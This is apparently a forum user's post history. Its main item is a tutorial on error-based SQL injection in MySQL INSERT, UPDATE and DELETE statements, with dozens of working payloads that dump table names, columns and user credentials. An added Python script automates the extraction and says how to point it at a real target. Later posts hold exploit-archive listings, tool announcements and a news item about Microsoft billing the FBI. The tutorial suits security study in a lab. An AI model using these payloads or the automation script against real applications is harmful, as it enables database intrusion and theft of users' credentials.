Everything posted by Fi8sVrs
SQL Injection in Insert, Update and Delete Statements
Author: Osanda Malith Jayathissa

Introduction

Most of the time when we talk about SQL injection we extract data using the UNION keyword, error based, blind boolean and time based injection methods. All of these apply where the application is performing a SELECT statement on the back-end database. How do we inject into places where the application is performing an INSERT, UPDATE or DELETE statement? INSERT statements are used, for example, when an application stores IP addresses, user agent strings, referrer URLs and other data in the database, and all three statements are used when manipulating user accounts: creating a new password, changing names, deleting accounts. It is not only user input that matters: whatever the application takes as input can be fuzzed, and if it is not properly sanitized or filtered we can go ahead and inject (assuming there are no WAFs or blacklists). This paper is based on the MySQL error response: the web application has to echo mysql_error() back to us.

Lab Setup

Let's first create a database named `newdb` and one sample table to practice our injections on. Stick to your localhost. Don't test against live websites without prior permission. I take no responsibility for any damage you cause.

CREATE DATABASE newdb;
USE newdb;
CREATE TABLE users (
  id int(3) NOT NULL AUTO_INCREMENT,
  username varchar(20) NOT NULL,
  password varchar(20) NOT NULL,
  PRIMARY KEY (id)
);

Syntax for Injecting

Now let's insert some sample data into our table. The syntax would be

INSERT INTO users (id, username, password) VALUES (1, 'Jane', 'Eyre');

The above query uses single quotes, so keep in mind that we have to inject like this:

INSERT INTO users (id, username, password) VALUES (1, ' 'Inject Here' ', 'Nervo');

If the query uses double quotes, the injection must use double quotes too:

INSERT INTO users (id, username, password) VALUES (1, " "Inject Here" ", "Nervo");

The same applies to UPDATE and DELETE statements. You can learn the syntax by breaking the statement and reading the error it produces, then add quotes in front where necessary to build a valid SQL query. Note that in these kinds of injections you cannot simply append a MySQL comment (-- or #) to discard the rest of the query as you would in a SELECT: inside the quoted value they are taken as ordinary characters, and once you close the string the remaining part of the statement (the other columns of the INSERT, the WHERE clause) still has to parse. The payloads below therefore close the string, OR in an expression that raises an error, and re-open an empty string (or '') so the statement stays valid.

Injection using updatexml()

If you know about XPATH injections you can use that knowledge here. Usually we use the updatexml() and extractvalue() functions, and the same can be used here: when the XPath expression they receive is invalid, MySQL raises "XPATH syntax error" and echoes the expression, so prefixing our data with 0x7e (~) turns it into invalid XPath and leaks it in the error. Assuming that you know about XPATH injections, I will proceed. Our payload would be

or updatexml(1,concat(0x7e,(version())),0) or

Insert

INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(version())),0) or'', 'Nervo');
ERROR 1105 (HY000): XPATH syntax error: '~5.5.35-0ubuntu0.12.04.1'

Update

UPDATE users SET password='Nicky' or updatexml(2,concat(0x7e,(version())),0) or'' WHERE id=2 and username='Olivia';

Delete

DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or'';

Extraction of Data

For the sake of this paper I will explain dumping data using the INSERT statement only. Nothing changes for UPDATE and DELETE; follow exactly the same method. To extract the table names from the information_schema database we build our payload like this:

or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or

Our query to extract the tables would be

INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or '', 'Nervo');
ERROR 1105 (HY000): XPATH syntax error: '~users'

To extract the columns the query would look like this; in my case the table_name is 'users'. Change the LIMIT offset (limit 1,1, limit 2,1, ...) to get the rest of the column names.

INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1)),0) or '', 'Nervo');
ERROR 1105 (HY000): XPATH syntax error: '~id'

Let's dump the first entry in the 'users' table using INSERT and DELETE.

INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1)),0) or '', 'Nervo');
ERROR 1105 (HY000): XPATH syntax error: '~1:Olivia:Nervo'

DELETE FROM users WHERE id=1 or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1)),0) or '';
ERROR 1105 (HY000): XPATH syntax error: '~1:Jane:Eyre'

You can retrieve tables and columns using updatexml() in INSERT, UPDATE and DELETE statements. However, you cannot dump data with the UPDATE statement from the same table you are updating. For example, I am now in the users table. If I run this query

UPDATE users SET password='Nicky' or updatexml(1,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM newdb.users limit 0,1)),0) or'' WHERE id=2 and username='Olivia';

it won't give out any data, because the subquery reads from the very table the UPDATE is modifying, which MySQL does not allow. In these scenarios the table you dump from has to be a different one. Once again, for the sake of this paper, create a new table 'students' with the columns id, name and address and insert some values. Now, if the injection point is in the 'students' table, we can dump data from the 'users' table, i.e. from any table other than the one being updated. This applies to the UPDATE statement only.

UPDATE students SET name='Nicky' or updatexml(1,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM newdb.users limit 0,1)),0) or'' WHERE id=1;
ERROR 1105 (HY000): XPATH syntax error: '~1:Jane:Eyre'

If you are stuck in an UPDATE statement injection you can use double query injection instead, which I discuss in a later section.

Injection using extractvalue()

This function can be used in XPATH injections too. Our payload using this function would look like this:

or extractvalue(1,concat(0x7e,database())) or

Insert

We can apply it in the INSERT statement like this.

INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,database())) or'', 'Nervo');
ERROR 1105 (HY000): XPATH syntax error: '~newdb'

Update

UPDATE users SET password='Nicky' or extractvalue(1,concat(0x7e,database())) or'' WHERE id=2 and username='Nervo';
ERROR 1105 (HY000): XPATH syntax error: '~newdb'

Delete

DELETE FROM users WHERE id=1 or extractvalue(1,concat(0x7e,database())) or'';
ERROR 1105 (HY000): XPATH syntax error: '~newdb'

Extraction of Data

Follow the same method discussed for updatexml(). This is an example of retrieving the tables from the information_schema database.

INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1))) or'', 'Nervo');
ERROR 1105 (HY000): XPATH syntax error: '~users'

To extract the column names the payload would look like this; in my case the table is 'users'.

INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1))) or'', 'Nervo');
ERROR 1105 (HY000): XPATH syntax error: '~id'

The final query to dump the username and password would be

INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1))) or '', 'Nervo');
ERROR 1105 (HY000): XPATH syntax error: '~1:Jane:Eyre'

You can use the same injection to extract data in UPDATE and DELETE statements. When dumping, the same rule about the UPDATE statement's target table applies as in the updatexml() method.

Injection using name_const()

This function was added in MySQL 5.0.12. name_const(name, value) returns value as a column named name, so selecting two such columns with the same name raises a "Duplicate column name" error that contains the name; we therefore put our data in the name. The payload would be

or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or

Insert

We can inject into the INSERT statement using the name_const() function like this.

INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or '', 'Nervo');

As expected this query returns the error with the version.

ERROR 1060 (42S21): Duplicate column name '5.5.35-0ubuntu0.12.04.1'

Update

The UPDATE statement would be in exactly the same format.

UPDATE users SET password='Nicky' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or '' WHERE id=2 and username='Nervo';

Delete

The DELETE statement looks exactly the same way.

DELETE FROM users WHERE id=1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a)or '';

Extraction of Data

In recent versions of MySQL you can only get the version out of the name_const() function: its arguments must be constants, and a subquery is rejected. In older versions that are still greater than or equal to 5.0.12 we can extract data further. To demonstrate this I will be using MySQL 5.0.45. First we need a simple test to check whether we can extract data or not; for that we use a simple SELECT as the name.

INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT 2),1),name_const((SELECT 2),1))a) or '', 'Nervo');

If you get this kind of error related to name_const, we cannot go further:

ERROR 1210 (HY000): Incorrect arguments to NAME_CONST

If you get this kind of error, you can go forward and extract data:

ERROR 1060 (42S21): Duplicate column name '2'

Now we can extract the table names from the information_schema database like this.

INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0,1),1),name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0,1),1))a) or '', 'Nervo');
ERROR 1060 (42S21): Duplicate column name 'users'

Let's extract the column names from the table 'users'.

INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1),name_const((SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1))a) or '', 'Nervo');
ERROR 1060 (42S21): Duplicate column name 'id'

Finally we can extract the data like this.

INSERT INTO users (id, username, password) VALUES (2,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT concat_ws(0x7e,id, username, password) FROM users limit 0,1),1),name_const((SELECT concat_ws(0x7e,id, username, password) FROM users limit 0,1),1))a) or '', 'Nervo');
ERROR 1060 (42S21): Duplicate column name '1~Jane~Eyre'

Double Query Injection

We can directly extract data from the database by using double query injection. However, in MySQL there is no such thing as a double query; this can also be called subquery injection. All we are trying to do is retrieve data in the form of an error, so we can also define it as error based injection. It relies on the well known floor(rand(0)*2) trick: rand(0) yields a fixed sequence, so when the GROUP BY key is our data concatenated with floor(rand(0)*2), MySQL tries to insert the same key twice into its temporary table and reports it in a "Duplicate entry" error.

Insert

INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'', 'Nervo');
ERROR 1062 (23000): Duplicate entry '~'newdb'~1' for key 'group_key'

Update

UPDATE users SET password='Nicky' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' WHERE id=2 and username='Nervo';
ERROR 1062 (23000): Duplicate entry '~'newdb'~1' for key 'group_key'

Delete

DELETE FROM users WHERE id=1 or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'';
ERROR 1062 (23000): Duplicate entry '~'newdb'~1' for key 'group_key'

Extracting Data

I assume you know about error based injections. We can easily dump the table names like this. Read through the query if it is hard to understand at a glance.

INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo');
ERROR 1062 (23000): Duplicate entry '~'students'~1' for key 'group_key'

Column names can be dumped in this manner. In my case the table is 'users' and the database is 'newdb'.

INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns WHERE table_schema=database() AND table_name='users' LIMIT 0,1)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo');
ERROR 1062 (23000): Duplicate entry '~'id'~1' for key 'group_key'

Use the LIMIT clause to go forward. Finally the usernames and passwords, which are our secret data, can be extracted like this.

INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT concat(0x7e,0x27,cast(users.username as char),0x27,0x7e) FROM `newdb`.users LIMIT 0,1) ) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo');
ERROR 1062 (23000): Duplicate entry '~'Olivia'~1' for key 'group_key'

The same applies to UPDATE and DELETE. You can inject using error based injection into those two statements too; there is no change, follow the same syntax.

Other Variations

I've noticed some variations in our payload. You can inject using these methods too:

' or (payload) or '
' and (payload) and '
' or (payload) and '
' or (payload) and '='
'* (payload) *'
" - (payload) - "

Conclusion

I hope you now understand the different methods of injection in INSERT, UPDATE and DELETE statements. Knowing manual injection helps when the injection points are different, helps in bypassing WAFs and helps to choose the right automation for dumping data. In my experience finding vulnerabilities as a security researcher in the real world, I've come across scenarios where input was not properly sanitized in these statements. Use this knowledge for educational purposes only.

Source
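As an added example (not code from the paper or its author), the following Python script automates the manual steps the paper walks through: it wraps an inner SELECT in the paper's `' or updatexml(...) or''` framing for the INSERT, UPDATE and DELETE shapes, parses the three error families the paper relies on (XPATH syntax error, Duplicate column name, Duplicate entry ... for key 'group_key') to pull the leaked value back out, and walks the LIMIT offset row by row. It also handles a limit the paper does not mention: MySQL shows at most 32 characters in an XPATH syntax error, so longer values are read in 31-character pieces with MID(). The DELETE shape (injection into a quoted username), the `send()` callback and the FakeMySQL class are assumptions made for this example; FakeMySQL is a constructed stand-in that imitates MySQL's error text for the lab table so the script runs offline, and in practice `send()` is the HTTP request that reaches the vulnerable statement.

```python
"""Error-based extraction through an injection point inside an INSERT, UPDATE
or DELETE statement (the paper's manual steps, automated).  Added example, not
the paper's code.  Assumes: the value sits inside a single-quoted string and
the app echoes mysql_error(); MySQL shows at most 32 characters in an XPATH
syntax error, so long values are read in 31-character pieces with MID();
FakeMySQL is a constructed stand-in for app + database (no real MySQL)."""
import re

CHUNK = 31  # 32-character XPATH error limit, minus the leading '~' marker

# Statement shapes from the paper; {} marks the attacker-controlled value.
# The DELETE shape (injection into a quoted username) is an assumption.
CONTEXTS = {
    "insert": "INSERT INTO users (id, username, password) VALUES (2,'{}', 'Nervo')",
    "update": "UPDATE users SET password='{}' WHERE id=2",
    "delete": "DELETE FROM users WHERE username='{}'",
}

# One pattern per error family the paper uses to carry data out.
LEAK_PATTERNS = (
    re.compile(r"XPATH syntax error: '~(.*)'$"),                      # updatexml/extractvalue
    re.compile(r"Duplicate column name '(.*)'$"),                     # name_const
    re.compile(r"Duplicate entry '~'(.*)'~1' for key 'group_key'$"),  # double query
)

def error_payload(inner_select, chunk_start=1, func="updatexml"):
    """Expression that raises an XPATH error carrying a piece of inner_select."""
    leak = f"concat(0x7e,mid(({inner_select}),{chunk_start},{CHUNK}))"
    if func == "updatexml":
        return f"updatexml(1,{leak},0)"
    if func == "extractvalue":
        return f"extractvalue(1,{leak})"
    raise ValueError("func must be 'updatexml' or 'extractvalue'")

def inject(context, inner_select, chunk_start=1, func="updatexml"):
    """Statement the backend runs: the value closes the string, ORs in the error
    expression and re-opens an empty string so the query still parses."""
    value = f"Olivia' or {error_payload(inner_select, chunk_start, func)} or'"
    return context.format(value)

def leaked_value(mysql_error):
    """Data carried by an echoed mysql_error() string, or None if nothing leaked."""
    for pattern in LEAK_PATTERNS:
        m = pattern.search(mysql_error)
        if m:
            return m.group(1)
    return None

def extract_value(send, context, inner_select, func="updatexml"):
    """Whole single-row, single-column result of inner_select, read in chunks.
    send(statement) returns the app's error text, or '' if there was no error."""
    out, start = "", 1
    while True:
        piece = leaked_value(send(inject(context, inner_select, start, func)))
        if not piece:
            return out
        out += piece
        if len(piece) < CHUNK:  # short piece: that was the end of the value
            return out
        start += CHUNK

def dump_rows(send, context, columns, from_clause, func="updatexml"):
    """Walk LIMIT n,1 until a row comes back empty: past the last row the subquery
    is NULL, updatexml() returns NULL instead of raising, and no error is echoed."""
    rows = []
    while True:
        inner = f"SELECT {columns} FROM {from_clause} limit {len(rows)},1"
        value = extract_value(send, context, inner, func)
        if value == "":
            return rows
        rows.append(value)

class FakeMySQL:
    """Constructed stand-in for the vulnerable app and MySQL.  It reads the LIMIT
    offset and MID() start out of the payload built above and answers with the
    32-character-truncated error MySQL 5.x prints for `rows`."""
    def __init__(self, rows):
        self.rows = rows
        self.log = []  # every statement "sent", for inspection

    def send(self, statement):
        self.log.append(statement)
        m = re.search(r"mid\(\(SELECT .* limit (\d+),1\),(\d+),(\d+)\)", statement)
        if not m:
            return ""
        offset, start, length = (int(g) for g in m.groups())
        if offset >= len(self.rows):
            return ""  # NULL subquery: no error raised
        piece = self.rows[offset][start - 1:start - 1 + length]
        return f"ERROR 1105 (HY000): XPATH syntax error: '{('~' + piece)[:32]}'"

if __name__ == "__main__":
    # Constructed lab rows; the third is longer than one error can show.
    db = FakeMySQL(["1:Jane:Eyre", "2:Olivia:Nervo", "3:" + "a" * 40 + ":x"])
    for name, context in CONTEXTS.items():
        print(name, dump_rows(db.send, context, "concat_ws(':',id, username, password)", "users"))
```

Running the file prints the three lab rows for each statement shape. Against a real target, replace `db.send` with a function that submits the injected value and returns the page's echoed mysql_error() text; everything else, including the chunking, stays the same. If the application does not echo the error, none of the error based methods in the paper apply and you are back to blind techniques.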
-
-
Yes, there is, but it costs money: World Numbers - Global Telephone Numbers Redirected Anywhere
-
CEH - Certified Ethical Hacker Practice Exams
500+ practice exam questions covering all CEH exam objectives
Realistic questions with detailed answer explanations
Electronic content includes: two practice exams, PDF eBook
Written by an IT security and education expert
Author: MATT WALKER
Download: http://www.scribd.com/doc/228144469/CEH-Certified-Ethical-Hacker-Practice-Exams
-
Learn SQL Server Administration in a Month of Lunches
Fi8sVrs posted a topic in Tutorials in English
Contents:
1 Before you begin
  1.1 Is this book for you?
  1.2 How to use this book
  1.3 Setting up your lab environment
      Choosing a SQL Server edition for your lab; Selecting a version of Windows for your lab; My recommendation for your lab environment; A word about SQL Server versions
  1.4 SQL Server documentation
  1.5 Online resources
  1.6 A word on my recommendations
  1.7 Being immediately effective with SQL Server
2 Server assessment and configuration
  2.1 Identifying instances and versions
  2.2 Identifying databases
  2.3 Identifying other server objects
  2.4 Inventorying the server configuration
  2.5 Hands-on lab
3 T-SQL crash course
  3.1 SELECT queries
      A basic SELECT query; Returning specific rows from the table; Delimiting string and date values; Sorting results; Finding T-SQL documentation
  3.2 DELETE, UPDATE, and INSERT queries
      DELETE queries; UPDATE queries; INSERT queries
  3.3 Assessing a database's structure
  3.4 Multitable SELECT queries
  3.5 Hands-on lab
4 Managing databases
  4.1 Configuring database options
  4.2 Detaching and attaching databases
  4.3 Assessing database storage
  4.4 Identifying potential performance concerns in storage
      Problems with file layout; Problems with file size; Filegroups
  4.5 System databases
  4.6 An overview of storage hardware
  4.7 Hands-on lab
5 Backup and recovery
  5.1 The transaction log
  5.2 How backups work
      Making a full database backup; Making a differential database backup; Making a transaction log backup
  5.3 How restoration works
      Preparing for recovery; Starting the recovery
  5.4 Model backup and recovery scenarios
  5.5 Special procedures for system databases
  5.6 Backup and recovery using T-SQL or PowerShell
  5.7 Hands-on lab
6 Authentication: who are you?
  6.1 Understanding logins
      Windows Authentication; Mixed Mode Authentication
  6.2 Understanding database users
  6.3 How the real world often does authentication
  6.4 Understanding application roles
  6.5 Hands-on lab
7 Authorization: what are you allowed to do?
  7.1 Understanding SQL Server permissions
      Securing database objects; Revoking permissions; Column-level permissions; The many sources of permissions
  7.2 Using server roles
  7.3 Using database roles
  7.4 Schemas and owners
      Owners; Schemas
  7.5 Permission chains
  7.6 How the real world often does authorization
  7.7 Hands-on lab
8 Accounting: what did you do?
  8.1 Triggers
  8.2 SQL Server Profiler
  8.3 Event logs and C2 auditing
  8.4 SQL Audit
      SQL Audit architecture; Creating an audit; Using SQL Audit for security auditing; Using SQL Audit for troubleshooting
  8.5 Hands-on lab
9 Analyzing indexes
  9.1 Index basics
  9.2 Heaps
Download: http://www.scribd.com/doc/228142928/Learn-SQL-Server-Administration-in-a-Month-of-Lunches
-
What is sb0x-project?
"sb0x-project is A Lightweight Framework for PenTesting Written in Python"
Platforms: Linux, BSD "or Unix systems"
Version 1.0.6 (prototype)

Basic Usage
Main sb0x shell:
  help, ? - print help
  load - load modules
  exit, q - exit
load shell:
  help, ? - print help
  list - modules list
  back - back to main
  info - dump module info, usage: info module_name
Use TAB for autocomplete.
Example: [1] load => admin_finder
For more information watch the video tutorial: Video Tutorials
Run a simple HTTP server: ./sb0x.py -s [PORT]
Run sb0x.py without the header: ./sb0x.py -n

How to write an sb0x module
If you are a Python developer, take a look at the API tutorial: sb0x-project API Tutorial

How to install sb0x
First install Python 2.7, download the sb0x repository, then run sb0x.py. If you get any errors, please report them as an Issue/Bug.

Old versions
sb0x old versions on SourceForge: sb0x 1.0.5, sb0x 1.0.4

Contributing
"Contributions are very welcome!" Write an sb0x module and send a pull request. Clone and edit the wiki. Create the sb0x logo. Create tutorials. Report bugs, ideas etc., and more.
License: GPL 3
Current dev version: 2.0.x
Author: Levi Nachmani (levi0x0)
Source
-
This archive contains all of the 220 exploits added to Packet Storm in March, 2014. list: ~/1403-exploits# ls ajaxpagination-lfi.txt aker-xss.txt alienvault450-saql.txt alliedtelesis-exec.txt allplayer581-overflow.txt allplayer_m3u_bof.rb.txt applefacetime-disclose.txt appletvitunes-disclose.txt arabicprawn-inject.txt arraynetworks-escalate.txt array_vxag_vapv_privkey_privesc.rb.txt aspnuke207-redir.txt audiocoder0829-corrupt.txt b2evolution-disclose.txt beheersysteem-exec.txt bigace-sqlxsslfi.txt bigdump-shell.txt bypassuac_injection.rb.txt bytecms-xss.txt calaverauploader-overflow.txt canonpixma-disclose.txt chat2-sqlxss.txt chatness-fixation.txt ciscorv110w-bypass.pdf cla-2014-001-php-font-lib-0.3-xss.txt clansphere20114-xss.txt clickdesk-xss.txt clipshare41-lfi.txt cmsimple354-xss.txt corappjobsearch-sql.txt CORE-2014-0002.txt coryapp-sql.txt cosmoshop-filewrite.txt couchdb-dos.txt CVE-2014-2238.rb.txt dir600l-xsrf.txt dotityourself-exec.txt easeustodo-credentials.txt editstuff-exec.txt emccloudtiering-xxe.txt estore12-sql.txt etchat307-passwd.txt eventyplus-xsrf.txt exec_shellcode.rb.txt fastcgisearch-exec.txt fitnessewiki-exec.txt fitnesse_wiki_rce.rb.txt freedownloadmanager-overflow.txt freepbx_config_exec.rb.txt ganib-sql.txt gdstarrating1922-xssxsrfsql.txt getgodownloadmanager-overflow.txt getgo-overflow.txt glambombworld-header.txt gnuboardautosave-sql.txt gnupanel-xssxsrf.txt goldmp4player-overflow.rb.txt gommp-corrupt.txt gomvc11060-corrupt.txt googleanalyticsmu-xsrf.txt Google-Report2702.pdf guppy-crlfxss.txt haihaisofthup-overflow.txt haihaisoftup-overflow.txt hdcsts-xsrf.txt herpesnet.class.py.txt horde_unserialize_exec.rb.txt hordewebmail-openredir.txt hp_dataprotector_exec_bar.rb.txt icamworkstation-bypass.txt ilchcms-xss.txt innoedit-exec.txt interworx-sql.txt ios7-exec.txt irc-outofbounds.txt ithoughts-xssuploaddos.txt jetvideo811-dos.txt joids-xssfixation.txt joomla322-xss.txt joomlaajaxshoutbox-sql.txt joomlaextplorer-xss.txt 
joomlafreichat-xss.txt joomlakunena-xss.txt joomlamulticalendar-xss.txt joomlapbbooking-xss.txt joomlayoutubegallery-xss.txt katello_satellite_priv_esc.rb.txt kcfinder253-shell.txt kenticocms-enumerate.txt kmplayer380117-overflow.txt lbe-sshkey.txt lifesize_uvc_ping_rce.rb.txt lightaudioplayer-corrupt.txt linex-passwd.txt litepublisher-xss.txt loadbalancerorg_enterprise_known_privkey.rb.txt luxcal-xsrfsql.txt macsaffir-dos.txt mantisbt1216-sql.txt mcafeeassetmanager-traversalsql.txt mediawiki1180-disclose.txt meiupic-lfi.txt microp-overflow.txt mohachat-xssredir.txt monocart-enumerate.txt morxkloxo-sql.txt mp3info085a-overflow.txt ms14_012_textrange.rb.txt mybbuploader-shell.txt NDSA20140311.txt netvolutionwcm-sql.txt nginx-1.4.0-exp.tgz nocms-xss.txt ntp_spquery.c ocportal-xsslfi.txt opencart1561-sql.txt openclassifieds2212-xss.txt opendocman127-sql.txt opensupports-bypassxsrf.txt opensupports-shell.txt opensupports-sql.txt openx2811-xsrf.txt oracledemantra-bypass.txt oracledemantra-leak.txt oracledemantra-lfi.txt oracledemantra-sql.txt oracledemantra-storedxss.txt oracledemantra-xss.txt oscmax-xsrf.txt owncloud-exec.txt oxatis-xss.txt oxideshop-xsscrlf.txt perf_swevent_init.c phonerlite-disclose.txt phploginscript-xss.txt phpsitemanager-xss.txt picsengine-sqlxss.txt primocms-exec.txt procentiaintellipen-sql.txt proxmox-xss.txt qe416-xss.txt qnxifwatchd-escalate.txt qnx-io-graphics.c qnx-phfont.c qnxphfont-enumeration.txt qnxphgrafx-enumerate.txt qnxphoton-dosescalate.txt qnxpppoectl-disclose.txt quantum_dxi_known_privkey.rb.txt quantum-root.txt quantum_vmpro_backdoor.rb.txt quantumvmpro-backdoor.txt rlpdaemon-dos.txt rt-sa-2014-002.txt SA-20140307-0.txt safari_user_assisted_download_launch.rb.txt SecPod_BarracudaDrive_Mult_XSS_Vuln.txt seeddms-shellxsstraversal.txt seportal25spid-sql.txt seportal_sqli_exec.rb.txt solidworks_workgroup_pdmwservice_file_write.rb.txt spagobi-inject.txt spagobi-xssshell.txt spagobi-xss.txt square031-xss.txt SSCHADV2013-YahooBB-001.txt 
SSCHADV2013-YahooBB-002-xss.txt SSCHADV2014-YahooBB-004-YahooBB-005.txt star57-exec.txt synologydsm-sql.txt trixbox-exec.txt uagcms-fixation.txt ubeeevw3200-xsrf.txt ubeeevw3200-xss.txt vfu-overflow.txt viruschaser-overflow.txt VL-1100.txt VL-1191.txt VL-1229.txt VL-1230.txt VL-1231.txt VL-1232.txt VL-1233.txt VL-1234.txt VL-1235.txt VL-1237.txt VL-1239.txt vlc-xss.txt vtigercrm56-lfi.txt watchguardxtm-xss.txt webmin1670-xss.txt welcartecommerce-sqlxss.txt wmp11057215230-corrupt.txt wpbarclaycart-shell.txt wpbizintel-shell.txt wpfcb-shell.txt wphtmlsitemap-xsrf.txt wpjsmultihotel-dosxss.txt wplayerslider-xsrftraversal.txt wppremiumgallery-shell.txt wpsixtees-shell.txt wpthecotton-shell.txt wpvadvsuploadify-shell.txt x7chat-xss.txt yiiframework-xsrf.txt yokogawa_bkbcopyd_bof.rb.txt yokogawa_bkhodeq_bof.rb.txt ZSL-2014-5171.txt ZSL-2014-5172.txt ZSL-2014-5173.txt ZSL-2014-5174.txt ZSL-2014-5175.txt ZSL-2014-5176.txt ZSL-2014-5177.txt ZSL-2014-5178.txt ZSL-2014-5179.txt ZSL-2014-5180.txt ZSL-2014-5181.txt ZSL-2014-5182.txt zyxel-bypass.txt
Download: Packet Storm New Exploits For March, 2014 (Packet Storm)
-
SkypeFreak
A Cross Platform Forensic Framework for Skype
Fully Open Source
Written in Python 2.7
Supports Windows, Linux and OS X
Will be ported to Ruby and PHP soon
Won't work with alternative accounts using Microsoft and Facebook

What is this all about?
This is a small idea of mine: a fully open source forensic framework for Skype. I love to analyze applications and explore how things work behind the scenes. The main goal of this application is to aid in forensic investigations.

What is so special in this?
Actually there are many other tools which can do the same thing, but I thought of writing an open source tool to help people understand what is really going on, and anyone can customize it according to their needs.

Will there be a big Forensic framework?
Yes. Hood3dRob1n, Nick Knight and I are planning a full fledged forensic framework covering the most popular applications such as Firefox, Google Chrome, Safari, Opera, etc. This will be available in Python, Ruby and PHP.

Conclusion
None of the applications you use today are safe; they often log everything you do. Do not use this application without permission, because that would be a violation of privacy. The author takes no responsibility for any kind of damage you cause. Please use this for educational purposes only.

Download: .zip | .tar.gz
Author: https://twitter.com/OsandaMalith
SkypeFreak by OsandaMalith
-
Microsoft often charges the FBI's most secretive division hundreds of thousands of dollars a month to legally view customer information, according to documents allegedly hacked by the Syrian Electronic Army. The SEA, a hacker group loyal to Syrian President Bashar al-Assad, is best known for hijacking Western media companies' social media accounts. (These companies include the Associated Press, CNN, NPR, and even the Daily Dot.) The SEA agreed to let the Daily Dot analyze the documents with experts before the group published them in full. The documents consist of what appear to be invoices and emails between Microsoft's Global Criminal Compliance team and the FBI's Digital Intercept Technology Unit (DITU), and purport to show exactly how much money Microsoft charges DITU, in terms of compliance costs, when DITU provides warrants and court orders for customers' data. In December 2012, for instance, Microsoft emailed DITU a PDF invoice for $145,100, broken down to $100 per request for information, the documents appear to show. In August 2013, Microsoft allegedly emailed a similar invoice, this time for $352,200, at a rate of $200 per request. The latest invoice provided, from November 2013, is for $281,000. None of the technologists or lawyers consulted for this story thought that Microsoft would be in the wrong to charge the FBI for compliance, especially considering it's well within the company's legal right to charge "reasonable expenses." Instead, they said, the documents are more of an indication of just how frequently the government wants information on customers. Some of the DITU invoices show hundreds of requests per month. For ACLU Principal Technologist Christopher Soghoian, the documents reiterated his stance that charging a small fee is a positive, in part because it creates more of a record of government tracking. 
In 2010, Soghoian actually chided Microsoft for not charging the Drug Enforcement Administration for turning over user records when instructed to by courts, noting that companies like Google and Yahoo did. Nate Cardozo, a staff attorney for the Electronic Frontier Foundation, agreed, and told the Daily Dot the government should be transparent about how much it pays. "Taxpayers should absolutely know how much money is going toward this," he said.

Compared with the National Security Agency, which has seen many of its programs exposed by former systems analyst Edward Snowden, DITU has a low profile. But it runs in the same circles. Multiple law enforcement and technology industry representatives described DITU to Foreign Policy as the FBI's liaison to the U.S.'s tech companies, and the agency's equivalent to the NSA. To that note, DITU is mentioned as a little-noticed detail from Snowden slides that detail the NSA's notorious PRISM program, which allows it to collect users' communications from nine American tech companies, including Microsoft. One slide explicitly mentions DITU's role in getting data from those companies.

